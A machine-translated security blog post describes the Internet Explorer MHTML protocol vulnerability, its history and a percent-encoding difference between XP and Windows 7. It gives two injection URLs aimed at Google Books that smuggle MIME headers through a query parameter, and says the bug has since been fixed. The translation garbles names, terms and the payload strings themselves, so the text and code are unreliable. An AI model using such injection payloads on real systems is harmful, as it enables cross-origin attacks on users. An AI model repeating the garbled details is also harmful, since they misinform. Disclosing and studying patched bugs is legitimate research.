RAyh4c Black Box
The MHTML Protocol Vulnerability was first proposed by Japanese Governor haskawa. HTML5 Security Cheatsheet maintained by Mario Heiderich, The phpids team leader, is included, this vulnerability is further traced back to the time when Liu Diyu cracked the Microsoft Vulnerability and the ice Fox prodigal sub-network horse ....
PAPER "cross-origin hazards caused by the MHTML protocol under IE", which is a dark-dark potential, has described various exploitation methods of this vulnerability.
Then the black pot on FD also exploded how to combine this vulnerability with other third-party software vulnerabilities across the region http://seclists.org/fulldisclosure/2011/Jan/224
When talking to me about this vulnerability in the black pot, I mentioned a small detail about the URL parameter passing with the % number in the MHTML protocol. In XP, the percentage sign in the MHTML protocol takes effect only after the second encode, that is, % must be converted to % 25, so that % will be recognized after parameter passing through the URL, but this problem does not occur in WIN7. Today, a test was just taken against the GOOGLE vulnerability of the 32th bull. record it.
Attack methods in XP:
Mhtml: http://www.google.com/books? Q = x % 250AContent-Type % 253 Amultipart % 252 frelated % 253 Bboundary % 253Dx -- x % 250AContent-Location % 253 Aajax % %%253abase64% 250d % 250a % 250d % %%253d -- x % 250A! Ajax
Attack methods in WIN7:
Mhtml: http://www.google.com/books? Q = x % 0AContent-Type % 3 Amultipart % 2 frelated % 3 Bboundary % 3Dx -- x % 0AContent-Location % 3 Aajax % signature % 3Abase64% 0d % 0a % 0d % signature % 3D -- x % 0A! Ajax
PS:
This vulnerability has been fixed by GOOGLE